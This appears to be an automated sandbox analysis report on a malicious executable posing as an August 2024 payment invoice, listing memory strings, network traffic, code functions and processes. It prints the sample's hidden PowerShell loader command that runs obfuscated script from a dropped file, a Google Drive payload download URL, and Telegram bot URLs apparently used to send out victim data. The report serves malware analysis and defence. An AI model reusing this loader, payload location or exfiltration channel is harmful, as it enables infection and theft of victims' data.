Source: powershell.exe, 00000001.00000002.1858126944.00000000051E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.1858126944.0000000005091000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: msiexec.exe, 00000004.00000002.4128839595.0000000020178000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: msiexec.exe, 00000004.00000002.4128839595.0000000020178000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: msiexec.exe, 00000004.00000002.4128839595.0000000020178000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: msiexec.exe, 00000004.00000002.4128839595.0000000020178000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:138727%0D%0ADate%20a
Source: msiexec.exe, 00000004.00000003.1925140710.0000000000876000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.1923872826.0000000000876000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: msiexec.exe, 00000004.00000002.4128839595.0000000020256000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4128839595.0000000020247000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4128839595.0000000020287000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: msiexec.exe, 00000004.00000002.4128839595.0000000020251000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: powershell.exe, 00000001.00000002.1860973910.00000000060FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.1860973910.00000000060FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.1860973910.00000000060FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: msiexec.exe, 00000004.00000002.4115622500.00000000007EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: msiexec.exe, 00000004.00000002.4128456196.000000001F6B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1ItIBdLavxGfZi6rWeX-K_CF9nDPwNWT3
Source: msiexec.exe, 00000004.00000002.4115622500.00000000007EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1ItIBdLavxGfZi6rWeX-K_CF9nDPwNWT3(
Source: msiexec.exe, 00000004.00000002.4115622500.00000000007EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1ItIBdLavxGfZi6rWeX-K_CF9nDPwNWT3t
Source: msiexec.exe, 00000004.00000002.4115622500.0000000000876000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.1969721891.0000000000876000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: msiexec.exe, 00000004.00000002.4115622500.000000000082E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.1925140710.0000000000876000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.1923872826.0000000000876000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1ItIBdLavxGfZi6rWeX-K_CF9nDPwNWT3&export=download
Source: powershell.exe, 00000001.00000002.1858126944.00000000051E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1860973910.00000000060FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: msiexec.exe, 00000004.00000002.4128839595.00000000200E0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4128839595.0000000020178000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4128839595.0000000020150000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: msiexec.exe, 00000004.00000002.4128839595.00000000200E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: msiexec.exe, 00000004.00000002.4128839595.0000000020150000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.186
Source: msiexec.exe, 00000004.00000002.4128839595.000000002010B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4128839595.0000000020178000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4128839595.0000000020150000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.186$
Source: msiexec.exe, 00000004.00000003.1925140710.0000000000876000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.1923872826.0000000000876000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: msiexec.exe, 00000004.00000002.4128839595.000000002019D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.0000000021361000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.0000000021313000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.00000000211BD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.000000002116F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.0000000021436000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.00000000211E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: msiexec.exe, 00000004.00000002.4129881517.00000000212EE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.00000000211BF000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.0000000021319000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.0000000021412000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.000000002114A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.0000000021175000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: msiexec.exe, 00000004.00000002.4128839595.000000002019D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.0000000021361000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.0000000021313000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.00000000211BD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.000000002116F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.0000000021436000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.00000000211E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: msiexec.exe, 00000004.00000002.4129881517.00000000212EE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.00000000211BF000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.0000000021319000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.0000000021412000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.000000002114A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.0000000021175000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: msiexec.exe, 00000004.00000003.1925140710.0000000000876000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.1923872826.0000000000876000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: msiexec.exe, 00000004.00000003.1925140710.0000000000876000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.1923872826.0000000000876000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: msiexec.exe, 00000004.00000003.1925140710.0000000000876000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.1923872826.0000000000876000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: msiexec.exe, 00000004.00000003.1925140710.0000000000876000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.1923872826.0000000000876000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: msiexec.exe, 00000004.00000002.4128839595.0000000020287000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: msiexec.exe, 00000004.00000002.4128839595.0000000020282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 62511 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62514
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62516
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62518
Source: unknown	Network traffic detected: HTTP traffic on port 62526 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62509 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62524 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62511
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62512
Source: unknown	Network traffic detected: HTTP traffic on port 62520 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62514 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62522 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62516 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62518 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62512 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62524
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62526
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62527
Source: unknown	Network traffic detected: HTTP traffic on port 62508 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62508
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62509
Source: unknown	Network traffic detected: HTTP traffic on port 62527 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62520
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62522

Source: unknown	HTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:62508 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.33:443 -> 192.168.2.4:62509 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:62527 version: TLS 1.2

Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe

Code function: 0_2_00405086 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405086

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Svarbrevets\PAGO FRAS. AGOSTO 2024..exe

Jump to dropped file

Source: C:\Windows\SysWOW64\msiexec.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe

Code function: 0_2_0040310F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_0040310F

Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe	Code function: 0_2_004048C5	0_2_004048C5
Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe	Code function: 0_2_004064CB	0_2_004064CB
Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe	Code function: 0_2_00406CA2	0_2_00406CA2
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_001FC146	4_2_001FC146
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_001FD278	4_2_001FD278
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_001F5362	4_2_001F5362
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_001FC468	4_2_001FC468
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_001FC738	4_2_001FC738
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_001FE988	4_2_001FE988
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_001FCA08	4_2_001FCA08
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_001FCCD8	4_2_001FCCD8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_001FCFAA	4_2_001FCFAA
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_001F7118	4_2_001F7118
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_001FE97A	4_2_001FE97A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_001FF961	4_2_001FF961
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_001F29E0	4_2_001F29E0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_001F9DE0	4_2_001F9DE0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_2283B7A8	4_2_2283B7A8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_22838FB0	4_2_22838FB0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_228381D0	4_2_228381D0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_22837B78	4_2_22837B78
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_22836488	4_2_22836488
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_22830498	4_2_22830498
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_22831E98	4_2_22831E98
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_2283E0A7	4_2_2283E0A7
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_22831EA8	4_2_22831EA8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_228338A8	4_2_228338A8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_2283C0B7	4_2_2283C0B7
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_228338B8	4_2_228338B8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_2283E0B8	4_2_2283E0B8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_228372B8	4_2_228372B8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_22834EC0	4_2_22834EC0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_228372C8	4_2_228372C8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_2283C0C8	4_2_2283C0C8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_22834ED0	4_2_22834ED0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_228308E0	4_2_228308E0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_2283F2E7	4_2_2283F2E7
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_228308F0	4_2_228308F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_228322F0	4_2_228322F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_2283D2F7	4_2_2283D2F7
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_2283F2F8	4_2_2283F2F8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_22830007	4_2_22830007
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_22836A07	4_2_22836A07
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_22833008	4_2_22833008
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_22834610	4_2_22834610
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_2283DC19	4_2_2283DC19
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_22836A18	4_2_22836A18
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_2283FC18	4_2_2283FC18
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_22836022	4_2_22836022
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_22834620	4_2_22834620
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_2283BC2B	4_2_2283BC2B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_2283DC28	4_2_2283DC28
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_22836030	4_2_22836030
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_2283BC38	4_2_2283BC38
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_22831A41	4_2_22831A41
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_22830040	4_2_22830040
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_22831A50	4_2_22831A50
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_2283EE57	4_2_2283EE57
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_2283345F	4_2_2283345F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_22833460	4_2_22833460
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_2283CE67	4_2_2283CE67
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_2283EE68	4_2_2283EE68
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_22836E72	4_2_22836E72
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_22836E70	4_2_22836E70
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_22834A78	4_2_22834A78
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_2283CE78	4_2_2283CE78
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_22835780	4_2_22835780
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_2283D787	4_2_2283D787
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_2283F788	4_2_2283F788
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_2283D798	4_2_2283D798
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_2283B798	4_2_2283B798
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_22838FA1	4_2_22838FA1
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_228311A0	4_2_228311A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_22832BAF	4_2_22832BAF
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_22832BB0	4_2_22832BB0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_2283E9C8	4_2_2283E9C8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_22835BD8	4_2_22835BD8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_2283E9D8	4_2_2283E9D8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_2283C9D8	4_2_2283C9D8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_2283C9E8	4_2_2283C9E8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_228315E8	4_2_228315E8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_22832FF9	4_2_22832FF9
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_228315F8	4_2_228315F8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_22832300	4_2_22832300
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_2283B307	4_2_2283B307
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_2283D308	4_2_2283D308
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_2283531A	4_2_2283531A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_2283B318	4_2_2283B318
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_22837722	4_2_22837722
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_22837720	4_2_22837720
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_22835328	4_2_22835328
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_2283A928	4_2_2283A928
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_2283A938	4_2_2283A938
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_2283E538	4_2_2283E538
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_22832749	4_2_22832749
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_22830D48	4_2_22830D48
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_2283E548	4_2_2283E548
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_2283C548	4_2_2283C548
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_22832758	4_2_22832758
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_2283C558	4_2_2283C558
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_22835770	4_2_22835770
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_22837B77	4_2_22837B77
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_2283F778	4_2_2283F778

Source: PAGO FRAS. AGOSTO 2024..exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/14@5/5

Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe

0_2_0040310F

Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe

Code function: 0_2_00404352 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_00404352

Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe

Code function: 0_2_0040205E CoCreateInstance,MultiByteToWideChar,

0_2_0040205E

Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe

File created: C:\Users\user\AppData\Roaming\underarmsmusklens

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7440:120:WilError_03

Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe

File created: C:\Users\user\AppData\Local\Temp\nss344C.tmp

Jump to behavior

Source: PAGO FRAS. AGOSTO 2024..exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process

Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: PAGO FRAS. AGOSTO 2024..exe

Virustotal: Detection: 20%

Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe

File read: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe "C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe"
Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Laseredes=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Vandrerlav.syn';$Overrislingerne=$Laseredes.SubString(15504,3);.$Overrislingerne($Laseredes)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Laseredes=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Vandrerlav.syn';$Overrislingerne=$Laseredes.SubString(15504,3);.$Overrislingerne($Laseredes)"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe	Section loaded: wintypes.dll	Jump to behavior
